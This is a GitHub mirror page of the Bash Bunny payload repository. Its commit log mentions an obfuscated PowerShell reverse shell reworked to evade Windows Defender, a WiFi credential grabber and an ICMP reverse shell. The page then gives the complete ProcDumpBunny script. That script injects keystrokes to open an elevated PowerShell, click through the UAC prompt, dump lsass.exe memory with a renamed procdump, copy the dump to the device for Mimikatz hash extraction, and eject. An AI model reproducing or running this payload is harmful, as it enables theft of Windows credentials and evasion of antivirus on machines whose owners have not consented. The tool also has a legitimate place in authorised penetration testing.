mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
287faf1f1e
* Uploaded ReverseBunny
Obfuscated reverse shell via powershell
* Uploaded WifiSnatch
Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
* Update ReverseBunny.txt
Changed payload to evade Windows Defender
* Update payload.txt
Added new "Eject Method" - props to Night(9o3)
* Update README.md
* Deleted ReverseBunny.txt
Deleted because of higher risk to get caught by AV
* Updated ReverseBunny to version 1.2
Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design
* Updated ReverseBunny to version 1.2
Updated README for ReverseBunny update
* Updated payload
fixed some stupid left overs <3
* Uploaded pingUinBunny
a reverse shell using icmp
* Delete payloads/library/remote_access/switch1 directory
* Uploaded pingUinBunny
A reverse shell using icmp
* Update README.md
* Update README.md
* Updated to PingZhell
* Update Bunny.pl
* Update README.md
* Update README.md
* Update payload.txt
* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl
* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md
* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt
* Update payload.txt
* Update README.md
* Update README.md
* Update Bunny.pl
* Created ProcDumpBunny
Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz
* Update README.md
* Update payload.txt
46 lines
1.2 KiB
Bash
46 lines
1.2 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: ProcDumpBunny
|
|
# Description: Dump lsass.exe with a renamed version of procdump
|
|
# Author: 0iphor13
|
|
# Version: 1.0
|
|
# Category: Credentials
|
|
# Attackmodes: HID, Storage
|
|
|
|
LED SETUP
|
|
|
|
Q DELAY 500
|
|
|
|
GET SWITCH_POSITION
|
|
DUCKY_LANG de
|
|
|
|
Q DELAY 500
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
|
|
|
LED STAGE1
|
|
|
|
#After you have adapted the delays for your target, add "-W hidden"
|
|
Q DELAY 1000
|
|
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
|
Q ENTER
|
|
Q DELAY 1000
|
|
#Depending on your language - you need to change this - english layout: "Q ALT y" for example
|
|
Q ALT j
|
|
Q DELAY 250
|
|
|
|
Q DELAY 250
|
|
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
|
|
Q DELAY 250
|
|
Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
|
Q DELAY 250
|
|
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
|
Q DELAY 250
|
|
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
|
Q DELAY 300
|
|
Q ENTER
|
|
|
|
LED FINISH
|